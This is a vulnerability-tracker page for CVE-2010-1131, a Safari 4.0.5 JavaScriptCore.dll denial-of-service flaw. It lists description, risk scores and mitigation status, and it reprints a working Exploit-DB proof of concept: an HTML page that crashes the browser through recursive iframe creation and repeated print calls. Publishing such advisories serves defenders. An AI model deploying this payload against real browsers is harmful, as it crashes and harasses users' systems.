CVE-2010-1131

medium

Published 2010-03-27 · Modified 2026-04-29

💬 Discuss on Community ✚ Propose mitigation

CVSS v3

—

CVSS v4 NEW

—

not yet in upstream

VIR risk

5.3

Description

JavaScriptCore.dll, as used in Apple Safari 4.0.5 on Windows XP SP3, allows remote attackers to cause a denial of service (application crash) via an HTML document composed of many successive occurrences of the <object> substring.

Predictions

Exploit likelihood

20%

Patch ETA

—

Heuristic predictions, AS-IS, for prioritization only.

Mitigations

No mitigations published for this CVE yet.

The vendor-content worker queues fetches as references arrive (check back in a few minutes). Or — if you've already worked around this in production — publish your fix to the community-verified tier.

✚ Propose a mitigation on Community → Mitigations published via the community go through AI scoring + 2 human reviewers + 7-day silent objection window before landing here with source_tier=community-verified.

Exploits

Public proof-of-concept code below. AS-IS, for defenders and authorised testing only.

Exploit-DB

EDB-12487 dos windows text · 1 KB

Mathias Karlsson · 2010-05-03

Apple Safari 4.0.5 - 'JavaScriptCore.dll' Stack Exhaustion

text exploit Source: Exploit-DB

<html>

<---------------------
Crash Report

  Problem Event Name:   APPCRASH
  Application Name:     Safari.exe
  Application Version:  5.31.22.7
  Application Timestamp:        4b8f94fa
  Fault Module Name:    JavaScriptCore.dll
  Fault Module Version: 5.31.22.5
  Fault Module Timestamp:       4b8cb88c
  Exception Code:       c00000fd
  Exception Offset:     000889f7
  OS Version:   6.1.7600.2.0.0.256.48
  Locale ID:    1053
  Additional Information 1:     d4bb
  Additional Information 2:     d4bb5342a8501f1ef1ad79845414ed25
  Additional Information 3:     57f4
  Additional Information 4:     57f4717a3dd18c61a213b49009cb5bb7

Tested on: Microsoft Windows 7
By: Mathias Karlsson
URL: http://h.ackack.net/

Note:
If you set the iframe src property to an external document containing the window.print(), the user does not have to press away the first print popup.

---------------------->

<script>
window.print();
a();
function a()
{
        setInterval(b,0);
}
function b()
{
        var c = document.createElement("iframe");
        c.setAttribute("src",document.location);
        document.getElementsByTagName("body")[0].appendChild(c);
        setInterval(a,0);
}
</script>
</html>

EDB-11838 dos windows verified

3lkt3F0k4 · 2010-03-22

Apple Safari 4.0.5 - Object Tag 'JavaScriptCore.dll' Crash (Denial of Service)

Source code queued for fetch — refresh in a moment.

OS impact

Windows Fixed 1 release

Version	Status	Fixed in
—	Not affected	—

Application impact

Vendor	Product	Versions	Fixed
apple	safari	`4.0.5`

References

Community-verified mitigations for this CVE will appear above when contributors publish them.

Verify integrity in audit chain (admin only). AS-IS.